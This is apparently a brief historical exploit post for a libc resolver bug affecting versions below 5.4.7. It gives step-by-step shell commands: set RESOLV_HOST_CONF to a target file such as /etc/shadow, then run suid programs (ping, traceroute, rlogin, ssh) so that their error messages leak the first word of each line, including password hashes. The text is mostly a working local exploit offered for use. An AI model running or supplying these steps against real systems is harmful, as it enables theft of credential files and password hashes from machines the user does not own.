This should be exploitable on systems with libc < 5.4.7. To exploit, run
the bash shell, and do:

	export RESOLV_HOST_CONF=<filename>

Where <filename> is the file you want to read (/etc/shadow is a good
start). Then, try each of the following:

	ping asdf
	traceroute asdf
	rlogin asdf
	ssh asdf

See if they work. If so, bingo. If not, try a couple other suid'ed
programs that need to look up hostnames. This will output something like:

	resolv+: "blahblahblahblahblah" is an invalid keyword

What's in the quotes is the first word of each line of the file. The
"first word" is the whole line up until a space is read... which for
/etc/shadow includes the encrypted password.